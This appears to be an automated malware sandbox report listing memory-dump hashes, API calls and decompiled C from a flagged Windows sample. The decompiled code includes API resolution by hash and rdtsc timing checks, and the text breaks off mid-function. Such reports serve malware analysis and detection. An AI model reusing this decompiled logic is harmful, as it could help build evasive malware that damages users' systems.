                                          • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                          • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                          • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
                                          • Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
                                          • Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
                                          • Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
                                          • Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                          • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                          • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
                                          • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                          • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                          • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                          • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                          • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                          • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                          • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                          • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                          • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                          • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                          • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                          • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                          • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                          • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                          • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                          • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.495125436.0000000000740000.00000040.00000001.sdmp, Offset: 00730000, based on PE: true
                                          • Associated: 00000005.00000002.495121461.0000000000730000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495211687.0000000000820000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495216287.0000000000830000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495220979.0000000000834000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495225389.0000000000837000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495229216.0000000000840000.00000040.00000001.sdmp
                                          • Associated: 00000005.00000002.495253633.00000000008A0000.00000040.00000001.sdmp
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                          • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                          • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 93%
                                          			E00409AB0(intOrPtr _a4) {
                                          				intOrPtr _v8;
                                          				char _v24;
                                          				char _v284;
                                          				char _v804;
                                          				char _v840;
                                          				void* _t24;
                                          				void* _t31;
                                          				void* _t33;
                                          				void* _t34;
                                          				void* _t39;
                                          				void* _t50;
                                          				intOrPtr _t52;
                                          				void* _t53;
                                          				void* _t54;
                                          				void* _t55;
                                          				void* _t56;
                                          
                                          				_t52 = _a4;
                                          				_t39 = 0; // executed
                                          				_t24 = E00407EA0(_t52,  &_v24); // executed
                                          				_t54 = _t53 + 8;
                                          				if(_t24 != 0) {
                                          					E004080B0( &_v24,  &_v840);
                                          					_t55 = _t54 + 8;
                                          					do {
                                          						E0041BE10( &_v284, 0x104);
                                          						E0041C480( &_v284,  &_v804);
                                          						_t56 = _t55 + 0x10;
                                          						_t50 = 0x4f;
                                          						while(1) {
                                          							_t31 = E00414DF0(E00414D90(_t52, _t50),  &_v284);
                                          							_t56 = _t56 + 0x10;
                                          							if(_t31 != 0) {
                                          								break;
                                          							}
                                          							_t50 = _t50 + 1;
                                          							if(_t50 <= 0x62) {
                                          								continue;
                                          							} else {
                                          							}
                                          							goto L8;
                                          						}
                                          						_t9 = _t52 + 0x14; // 0xffffe045
                                          						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                          						_t39 = 1;
                                          						L8:
                                          						_t33 = E004080E0( &_v24,  &_v840);
                                          						_t55 = _t56 + 8;
                                          					} while (_t33 != 0 && _t39 == 0);
                                          					_t34 = E00408160(_t52,  &_v24); // executed
                                          					if(_t39 == 0) {
                                          						asm("rdtsc");
                                          						asm("rdtsc");
                                          						_v8 = _t34 - 0 + _t34;
                                          						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                          					}
                                          					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                          					_t20 = _t52 + 0x31; // 0x5608758b
                                          					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                          					return 1;
                                          				} else {
                                          					return _t24;
                                          				}
                                          			}




















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.494965073.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                          • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                          • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                          • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID: .AP
                                          • API String ID: 3899507212-3996626295
                                          • Opcode ID: eb4639adcfe72850460e52e010fafad2700d855224a7a1726b57435985c72a8e
                                          • Instruction ID: c009012f4d06892a8badbdf1a61c079b067406075ed75cb7a71715715e278ce3
                                          • Opcode Fuzzy Hash: eb4639adcfe72850460e52e010fafad2700d855224a7a1726b57435985c72a8e
                                          • Instruction Fuzzy Hash: 231191B5200248ABCB14DF69DC80DEB77A9EF88318F14854AF94D97202C634E8218BB5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E0041A630(intOrPtr _a4, char _a8, long _a12, long _a16) {
                                          				void* _t10;
                                          				void* _t15;
                                          
                                          				E0041AF60(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                          				_t6 =  &_a8; // 0x414536
                                          				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
                                          				return _t10;
                                          			}






                                          APIs
                                          • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID: 6EA
                                          • API String ID: 1279760036-1400015478
                                          • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                          • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                          • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 30%
                                          			E00408308(intOrPtr _a4, long _a8) {
                                          				char _v67;
                                          				char _v68;
                                          				void* _t12;
                                          				int _t13;
                                          				long _t20;
                                          				void* _t24;
                                          				int _t25;
                                          				void* _t28;
                                          				void* _t30;
                                          
                                          				asm("popad");
                                          				asm("in al, 0xe8");
                                          				asm("out 0xb6, eax");
                                          				asm("adc [ecx], ebx");
                                          				asm("arpl [ebp-0x75], dx");
                                          				_t28 = _t30;
                                          				_v68 = 0;
                                          				E0041BE60( &_v67, 0, 0x3f);
                                          				E0041CA00( &_v68, 3);
                                          				_push( &_v68);
                                          				_t24 = _a4 + 0x1c;
                                          				_push(_t24); // executed
                                          				_t12 = E0040ACF0(); // executed
                                          				_t13 = E00414E50(_t24, _t12, 0, 0, 0xc4e7b6d6);
                                          				_t25 = _t13;
                                          				if(_t25 != 0) {
                                          					_t20 = _a8;
                                          					_t13 = PostThreadMessageW(_t20, 0x111, 0, 0); // executed
                                          					_t37 = _t13;
                                          					if(_t13 == 0) {
                                          						_t13 =  *_t25(_t20, 0x8003, _t28 + (E0040A480( &_v68, _t37, 1, 8, _t13) & 0x000000ff) - 0x40);
                                          					}
                                          				}
                                          				return _t13;
                                          			}












                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 022309b0a114641dc96f8a158e41957f58ce770008af985295b9c71f3e941b7b
                                          • Instruction ID: 132a2729910248c5b9012028b4aafaa8e1e309429eb340b99b16db9d9163147e
                                          • Opcode Fuzzy Hash: 022309b0a114641dc96f8a158e41957f58ce770008af985295b9c71f3e941b7b
                                          • Instruction Fuzzy Hash: F801F93198032876E720AA918C43FEE7728AF41B54F14012EFF04BA1C1E6F9290647E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 55%
                                          			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
                                          				char _v67;
                                          				char _v68;
                                          				void* _t12;
                                          				intOrPtr* _t13;
                                          				int _t14;
                                          				long _t21;
                                          				void* _t24;
                                          				intOrPtr* _t25;
                                          				void* _t26;
                                          
                                          				_v68 = 0;
                                          				E0041BE60( &_v67, 0, 0x3f);
                                          				E0041CA00( &_v68, 3);
                                          				_push( &_v68);
                                          				_t24 = _a4 + 0x1c;
                                          				_push(_t24); // executed
                                          				_t12 = E0040ACF0(); // executed
                                          				_t13 = E00414E50(_t24, _t12, 0, 0, 0xc4e7b6d6);
                                          				_t25 = _t13;
                                          				if(_t25 != 0) {
                                          					_t21 = _a8;
                                          					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                          					_t33 = _t14;
                                          					if(_t14 == 0) {
                                          						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480( &_v68, _t33, 1, 8, _t14) & 0x000000ff) - 0x40);
                                          					}
                                          					return _t14;
                                          				}
                                          				return _t13;
                                          			}












                                          APIs
                                          • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                          Memory Dump Source
                                          • Source File: 00000005.00000001.459709526.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                          • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                          • Opcode Fuzzy Hash: 2d1f258feb65caa57005a4ca8181d3a83820067681332b4e8454df4711668a76
                                          • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E00408393(signed int __edx, void* __edi, char _a1, intOrPtr _a8, long _a12, char* _a16, int _a20) {
                                          				char* _v4;
                                          				char* _v8;
                                          				char* _v132;
                                          				char* _v136;
                                          				char _v656;
                                          				char* _v668;
                                          				char _v680;
                                          				char* _v684;
                                          				char _v688;
                                          				char* __ebx;
                                          				int __esi;
                                          				void* _t61;
                                          				int _t62;
                                          				void* _t68;
                                          				long _t69;
                                          				void* _t71;
                                          				int _t72;
                                          				void* _t74;
                                          
                                          				_t66 = __edx;
                                          				_t68 = __edi - 1;
                                          				asm("pushad");
                                          				_t1 = _t68 - 0x4273c49d;
                                          				 *_t1 =  *(_t68 - 0x4273c49d) & __edx;
                                          				asm("scasb");
                                          				if( *_t1 < 0) {
                                          					_push(_t71); // executed
                                          					_t61 = E0040ACF0(); // executed
                                          					_t62 = E00414E50(_t71, _t61, 0, 0, 0xc4e7b6d6);
                                          					_t72 = _t62;
                                          					if(_t72 != 0) {
                                          						_push(_t68);
                                          						_t69 = _a12;
                                          						_t62 = PostThreadMessageW(_t69, 0x111, 0, 0); // executed
                                          						_t82 = _t62;
                                          						if(_t62 == 0) {
                                          							_t62 =  *_t72(_t69, 0x8003, _t74 + (E0040A480(_t66, _t82, 1, 8, _t62) & 0x000000ff) - 0x40);
                                          						}
                                          					}
                                          					return _t62;
                                          				} else {
                                          					__ebp =  &_a1;
                                          					__eflags = __ebp;
                                          					_pop(ss);
                                          					_push(__ebp);
                                          					__ebp = __esp;
                                          					__esp = __esp - 0x2ac;
                                          					_push(__ebx);
                                          					_push(__esi);
                                          					_push(__edi);
                                          					__eax = 0;
                                          					_v4 = 0;
                                          					_v684 = 0;
                                          					 &_v680 = E0041BE60( &_v680, 0, 0x2a4);
                                          					__esi = _a20;
                                          					__ecx =  *((intOrPtr*)(__esi + 0x300));
                                          					__edi = _a8;
                                          					__eax = E00408310(__eflags, _a8,  *((intOrPtr*)(__esi + 0x300))); // executed
                                          					__eax = E0041B750(__ecx);
                                          					_t14 =  *((intOrPtr*)(__esi + 0x2d4)) + 0x29000; // 0x29000
                                          					__ebx = __eax + _t14;
                                          					_a20 = 0;
                                          					while(1) {
                                          						__eax = E0040F670(__edi, 0xfe363c80); // executed
                                          						__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                          						__eax =  &_v688;
                                          						__eax = E0041A500(__edi,  *((intOrPtr*)(__esi + 0x2f4)), __ebx,  &_v688, 0x2a8, 0); // executed
                                          						 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                                          						__eflags = __eax;
                                          						if(__eax < 0) {
                                          							break;
                                          						}
                                          						__eflags = _v656;
                                          						if(_v656 == 0) {
                                          							L13:
                                          							__eax = _a16;
                                          							__eax = _a16 + 1;
                                          							_a16 = __eax;
                                          							__eflags = __eax - 2;
                                          							if(__eax < 2) {
                                          								continue;
                                          							} else {
                                          								__ebx = _v8;
                                          								goto L17;
                                          							}
                                          						} else {
                                          							__eflags = _v668;
                                          							if(_v668 == 0) {
                                          								goto L13;
                                          							} else {
                                          								__eflags = _v136;
                                          								if(_v136 == 0) {
                                          									goto L13;
                                          								} else {
                                          									__eflags = _v132;
                                          									if(_v132 != 0) {
                                          										__eax = _a12;
                                          										__edx =  &_v688;
                                          										__ebx = 1;
                                          										__eax = E0041BDE0(_a12,  &_v688, 0x2a8);
                                          										L17:
                                          										__ecx =  *((intOrPtr*)(__esi + 0x2f4));
                                          										__eax = E0041A490(__edi,  *((intOrPtr*)(__esi + 0x2f4))); // executed
                                          										__eflags = __ebx;
                                          										if(__ebx == 0) {
                                          											break;
                                          										} else {
                                          											__edx = _v668;
                                          											__eax = _a12;
                                          											__ecx = _v136;
                                          											 *((intOrPtr*)(_a12 + 0x14)) = _v668;
                                          											__edx =  *((intOrPtr*)(__esi + 0x2d0));
                                          											_t34 = __esi + 0x2e8; // 0x2e8
                                          											__eax = _t34;
                                          											 *_t34 = _v136;
                                          											__eax = _a12;
                                          											_t36 = __esi + 0x314; // 0x314
                                          											__ebx = _t36;
                                          											__ecx = 0;
                                          											__eax = _a12 + 0x220;
                                          											 *__ebx = 0x18;
                                          											 *((intOrPtr*)(__esi + 0x318)) = 0;
                                          											 *((intOrPtr*)(__esi + 0x320)) = 0;
                                          											 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                          											 *((intOrPtr*)(__esi + 0x324)) = 0;
                                          											 *((intOrPtr*)(__esi + 0x328)) = 0;
                                          											__eax = E00419D10(__edi, _a12 + 0x220,  *((intOrPtr*)(__esi + 0x2d0)), __ebx, _a12 + 0x220);
                                          											__ecx = 0;
                                          											 *((intOrPtr*)(__esi + 0x2dc)) = __eax;
                                          											__eflags = __eax;
                                          											if(__eax < 0) {
                                          												break;
                                          											} else {
                                          												__edx = _v132;
                                          												_t44 = __esi + 0x2e0; // 0x2e0
                                          												__eax = _t44;
                                          												 *((intOrPtr*)(__esi + 0x318)) = 0;
                                          												 *((intOrPtr*)(__esi + 0x320)) = 0;
                                          												 *((intOrPtr*)(__esi + 0x31c)) = 0;
                                          												 *((intOrPtr*)(__esi + 0x324)) = 0;
